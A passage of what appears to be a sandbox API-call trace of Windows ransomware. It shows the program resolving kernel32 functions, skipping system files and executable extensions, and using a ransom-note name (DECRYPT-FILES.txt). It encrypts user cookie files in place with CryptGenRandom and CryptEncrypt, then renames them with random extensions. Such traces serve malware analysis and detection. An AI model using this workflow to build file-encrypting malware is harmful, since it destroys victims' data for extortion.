returned="CreateSemaphoreA" [0180.977] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0180.977] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0180.977] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0180.977] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0180.977] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0180.977] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0180.978] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0180.978] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0180.978] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0180.978] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0180.978] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0180.978] lstrlenA (lpString="CREATETHREAD") returned 12 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0180.978] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0180.978] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0180.978] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0180.978] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0180.978] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0180.978] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0180.978] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0180.978] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0180.978] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0180.978] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0180.978] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0180.978] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0180.978] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0180.978] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0180.979] lstrlenA (lpString="CTRLROUTINE") returned 11 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0180.979] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0180.979] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0180.979] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0180.979] lstrlenA (lpString="DEBUGBREAK") returned 10 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0180.979] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0180.979] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0180.979] lstrlenA (lpString="DECODEPOINTER") returned 13 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0180.979] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0180.979] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0180.979] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0180.979] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0180.979] lstrlenA (lpString="DELETEATOM") returned 10 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0180.979] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0180.979] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0180.979] lstrlenA (lpString="DELETEFIBER") returned 11 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0180.979] lstrlenA (lpString="DELETEFILEA") returned 11 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0180.979] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0180.979] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0180.979] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0180.980] lstrlenA (lpString="DELETEFILEW") returned 11 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0180.980] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0180.980] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0180.980] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0180.980] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0180.980] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0180.980] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0180.980] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0180.980] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0180.980] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0180.980] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0180.980] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0180.980] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0180.980] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0180.980] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.980] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.980] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.980] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.980] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.980] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.981] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.981] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.981] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.981] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.981] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.981] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.981] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.981] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.981] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.981] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.981] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.981] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.981] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.981] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.981] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.981] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.981] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.982] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8") returned 112 [0180.982] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8.3AeXzUA") returned 120 [0180.982] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oo3x8"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8.3AeXzUA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oo3x8.3aexzua"), dwFlags=0x0) returned 1 [0180.982] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.983] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.983] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.983] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1e658910, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e658910, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xab35f260, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x177, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", cAlternateFileName="5P5NRG~1.B13")) returned 1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="DECRYPT-FILES.txt") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="autorun.inf") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="boot.ini") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="desktop.ini") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="ntuser.dat") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="iconcache.db") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="bootsect.bak") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="ntuser.dat.log") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="thumbs.db") returned -1 [0180.983] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW", lpString2="Bootfont.bin") returned -1 [0180.983] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW") returned 45 [0180.983] lstrcmpiW (lpString1="b13FyW", lpString2="lnk") returned -1 [0180.983] lstrcmpiW (lpString1="b13FyW", lpString2="exe") returned -1 [0180.983] lstrcmpiW (lpString1="b13FyW", lpString2="sys") returned -1 [0180.983] lstrcmpiW (lpString1="b13FyW", lpString2="dll") returned -1 [0180.983] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0180.983] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW") returned 45 [0180.984] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0180.984] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW" [0180.984] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.984] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13FyW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt.b13fyw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.984] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=375) returned 1 [0180.985] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.985] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.985] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.985] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.985] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.985] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0180.985] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.986] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.986] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.986] CloseHandle (hObject=0x280) returned 1 [0180.986] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.986] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0180.987] CloseHandle (hObject=0x0) returned 0 [0180.987] CloseHandle (hObject=0x27c) returned 1 [0180.987] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.988] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.988] GetTickCount () returned 0x1134af5 [0180.988] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.988] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.988] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.988] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.988] lstrlenA (lpString="kernel32.dll") returned 12 [0180.989] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.989] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.989] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.989] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.989] lstrlenA (lpString="ADDATOMA") returned 8 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.989] lstrlenA (lpString="ADDATOMW") returned 8 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.989] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.989] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.989] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.989] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.989] lstrlenA 